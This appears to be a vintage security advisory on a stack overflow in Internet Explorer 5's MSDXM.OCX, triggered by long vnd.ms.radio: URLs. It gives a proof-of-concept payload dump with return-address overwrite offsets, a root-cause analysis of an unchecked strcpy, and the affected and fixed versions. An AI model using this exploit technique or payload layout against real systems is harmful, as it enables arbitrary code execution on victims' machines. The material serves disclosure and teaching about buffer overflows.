COMMAND
Internet Explorer
SYSTEMS AFFECTED
IE5 (9x, NT)
PROBLEM
Jeremy Kothe found following. Evaluating
"vnd.ms.radio:\\aaaaaaaaaaa...." causes an exploitable stack
overrun. By providing an oversize (360 byte) URL using the
vnd.ms.radio protocol, a malicious web site or e-mailer (or...)
can cause arbitrary code to be executed on a client machine.
The file with the overrun is MSDXM.OCX - 807,184 bytes. It came
to with IE 5.xxx, and is identical on every installation seen so
far. This was tested:
IE: 5.00.2314.1003IC
IE: 5.00.2614.3500
Windows: 98 OSR 1
NT Wks 4.0 SP5
The following is the binary for a URL or link which overflows the
stack and displays a simple MessageBox, then loops endlessly
(ExitProcess wasn't around). Jeremy used addresses from MSDXM.OCX
which is where the overrun is. If you banged your head against
richedxx.dll (solar d. spyrit,...), then you'll appreciate this
file. It's mapped at 0x1d300000 and is 800k. With all chars
except 0, 9, 0a, 0c, 20, 22, 23, 25, 2e, 2f, 5c allowed in the
buffer.
Off Text Binary (where non-text)
------------------------------------------------
000 vnd.ms.radio:\\j
010 kwashere9991.... C0890783
020 ..PWWP....0...00 EF0C, FF151416, 1DEBFE
030 0000000000000000
040 0000000000000000
050 0000000000000000
060 0000000000000000
070 0000000000000000
080 0000000000000000
090 0000000000000000
0A0 0000000000000000
0B0 0000000000000000
0C0 0000000000000000
0D0 0000000000000000
0E0 0000000000000000
0F0 0000000000000000
100 0000000000000000
110 0000000000000000
120 0000000000000000
130 0000000000.00000 1D
140 00.000.000.000.0 1D, 1D, 1D, 1D
150 000.o6.0000000.0 1A6F361D, 1D
160 000000.0 1D
------------------------------------------------
Straight after the "vnd.ms.radio:\\", there is data, then code.
Jeremy placed them there because there's over 0x100 bytes of
space here, and edi points to offset 1bh at the point of no
return. If you need more space (writing a word processor?), IE
allows somewhere between 2-4k in addition to what he used (which
would be large enough for a modest "worm".) The address at offset
154h overwrites the return address with a pointer to a "call edi"
which calls the code...
All the other "1D"'s are to provide readable pointers to avoid
exceptions while waiting for the end of the call. (They're
actually 0x1d303030's.)
How did it happen? Jeremy coded the exploit without paying much
attention to what the source was saying, then at the end decided
he would go and find out how a relatively new piece of software
like this could allow a dreary old unchecked stack overflow. The
original exception was reported within msvcrt.dll's mcsstr
function. The stack had been overwritten, but the arguments and
return address for mcsstr (and no further) were written over the
top. This meant the overrun must have ocurred in the calling
function. The return address is in MSDXM.OCX at 0x1d365585.
Looking back upwards from the call to mcsstr, the previous call
is to _mbsnbcat (strncat). Should be safe enough. Above that is
_mbsrchr (strrchr). That's begnign also. Next comes the (guess)
inevitable - an inline strcpy into a 0x100 byte buffer situated
on the stack 0x40 bytes into the local frame.
Examining further reveals that the author is assuming that the
final portion of the url (after the last forward or back-slash) is
less than 256 chars. Basically, it boils down to:
{
char acBuffer[ 256 ];
strcpy( acBuffer, pszInput )
}
again.
Conclusions: 1. Static buffers kill.
2. Functions which fill buffers without size
constraints are evil.
3. If you don't know how big it is, find out before
you copy it.
4. None of these conclusions are new.
In short, sized strings: 12329852,
null-terminated strings: 0.
The root of the problem is this: The API's of nearly all OSes
require terminated strings. The programmer is therefore required
to use them, and because the provided functions for converting
are so messy, and the support functions for sized strings so
(comparitively) convoluted that using sized strings internally
while converting them for the API is not practical. Programming
for Windows in particular gets messy, because you must use
ANSI-style strings to maintain 9x compatibility, and convert to
sized to use COM/OLE. If you EVER see a classic-style overrun in,
say, a Delphi app, you know it was related (however distantly) to
an API call. Other than that, there is no reason to use anything
but "string"s, and therefore no maximum string lengths - Unless
you count 4gb as a limit... (one day.)
SOLUTION
This exploit does not seem to affect the version of Internet
Explorer bundled with Windows Millennium Beta 2 (build 4.90.2419).
That version of IE is reported as 5.50.3825.1300, and the
pertinent information for MSDXM.OCX is as follows:
Version: 6.4.7.1028
Size: 843,536 bytes
This exploit also seems ineffective against the version of IE that
is bundled with Windows 2000 Professional RC3 (build 2183).
MSDXM.OCX:
Version: 6.4.9.1109
Size: 842,240 (on disk)
IE Version: 5.00.2920.0000
Also, on IE 5.00.2014.0216 (Win98) with all the latest patches
installed, so it has probably been fixed in a previous patch,
most likely one of the earlier ones, as it wasn't exploitable
some months ago either.
MSDXM.OCX is a directshow filter, that parses directshow streams
to an appropriate codec, receives the response, and uses the
other DirectX functions to draw (or play) the resulting stream to
the user's hardware (at least, that's what I've been able to
glean from some documentation). And, no doubt, the newer version
suffers from some similar stack overrun characteristics.
The C-Standards people need to do something. This is an almost
uniquely C-based problem. Deprecate null-terminated strings
and/or any function which fills one without a maximum. Make
sized strings a compiler-supplied service with syntax as simple
as vb or delphi, with typecasting support for converting for
API's. Relying on classes and macros is very noble, but produces
unavoidable syntactical subtleties which detract from the
simplicity of the concept of string-manipulation. This leaves
most programmers resorting to the (still too-messy) concept of
using BSS or stack buffers. Why should any programmer have to
think about people feeding programs into their "strings"?
Strings should be as easy to use as integers. Arrays of
characters can then revert to being... just that, and can be
strictly bounds-checked... and the script kiddies will have to
learn cryptography... and might get jobs.